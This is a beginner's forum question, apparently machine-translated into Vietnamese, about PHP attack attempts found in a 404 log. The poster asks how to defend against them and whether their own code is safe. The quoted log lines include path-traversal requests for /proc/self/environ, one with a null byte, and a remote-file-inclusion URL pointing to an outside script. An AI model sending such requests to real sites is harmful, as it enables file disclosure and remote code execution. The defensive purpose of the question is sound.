Nhìn qua nhật ký 404 của tôi, tôi nhận thấy hai URL sau, cả hai đều xảy ra một lần:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
và
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Trang được đề cập, library.php
yêu cầu một type
biến có nửa tá giá trị chấp nhận khác nhau và sau đó là một id
biến. Vì vậy, một URL hợp lệ có thể là
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
và các id đều chạy qua mysql_real_escape_string
trước khi được sử dụng để truy vấn cơ sở dữ liệu.
Tôi là một tân binh, nhưng dường như cả hai liên kết này đều là những cuộc tấn công đơn giản chống lại webroot?
1) Làm thế nào tốt nhất để bảo vệ chống lại những thứ này ngoài 404?
2) Tôi có nên chấp nhận (các) IP chịu trách nhiệm không?
EDIT: cũng chỉ nhận thấy điều này
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: IP vi phạm cho cả 3 cuộc tấn công là 216.97.231.15
dấu vết của một ISP có tên Lunar Pages nằm ngay bên ngoài Los Angeles.
EDIT 3: Tôi đã quyết định gọi cho ISP vào sáng thứ Sáu theo giờ địa phương và thảo luận vấn đề với bất cứ ai tôi có thể nhận được trên điện thoại. Tôi sẽ đăng kết quả ở đây trong 24 giờ hoặc lâu hơn.
EDIT 4: Cuối cùng tôi đã gửi email cho quản trị viên của họ và họ trả lời rằng "họ đang xem xét nó" và sau đó một ngày sau đó "vấn đề này cần được giải quyết ngay bây giờ". Không có thêm chi tiết, đáng buồn.
type
nói với kịch bản trong đó bao gồm việc sử dụng (mặc dù thông qua một IF $_GET['type'] == 'thing') {} ESLE...
, không phải là một liên kết trực tiếp như include 'type.php'
) và id
được điều hành thông qua mysql_real_escape_string và đó được sử dụng cho các truy vấn. Biết rằng, tôi vẫn an toàn?